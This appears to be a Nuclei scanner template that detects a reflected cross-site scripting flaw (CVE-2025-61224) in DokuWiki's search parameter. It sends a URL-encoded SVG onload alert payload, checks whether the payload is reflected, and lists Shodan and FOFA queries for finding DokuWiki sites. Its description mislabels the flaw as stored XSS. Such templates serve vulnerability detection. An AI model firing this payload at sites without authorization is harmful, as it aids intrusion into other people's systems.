DokuWiki <= 2025-05-14a Librarian - Reflected Cross-Site Scripting

id: CVE-2025-61224

info:
  name: DokuWiki <= 2025-05-14a Librarian - Reflected Cross-Site Scripting
  author: lolkatz,0x_Akoko
  severity: medium
  description: |
   DokuWiki 2025-05-14a 'Librarian' contains a stored XSS caused by improper sanitization of the 'q' parameter, letting remote attackers execute arbitrary scripts, exploit requires no special privileges.
  impact: |
   Remote attackers can execute arbitrary scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.
  remediation: |
   Update to the latest version of DokuWiki.
  reference:
    - https://github.com/dokuwiki/dokuwiki/issues/4512
    - https://github.com/MarioTesoro/vulnerability-research/tree/main/CVE-2025-61224
    - https://nvd.nist.gov/vuln/detail/CVE-2025-61224
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-61224
    epss-score: 0.00404
    epss-percentile: 0.31973
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: dokuwiki
    product: dokuwiki
    shodan-query: http.html:"content=\"DokuWiki"
    fofa-query: body="content=\"DokuWiki"
  tags: cve,cve2025,dokuwiki,xss,reflected

http:
  - method: GET
    path:
      - '{{BaseURL}}/doku.php?id=start&do=search&q=the%20%40%3Csvg%2Fonload%3Dalert%60document.domain%60%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'current changed">@<svg/onload=alert'
          - 'content="DokuWiki'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bcc36f38be969d88cd9ef5e092d381cdb9ba2de6d2eceb88b40d12737359abaf022100ce4e3865b3e78bda4a4dd000c031b3a44498fd71f9b4eac4bb8db9a3c38431b6:922c64590222798bb761d5b6d8e72950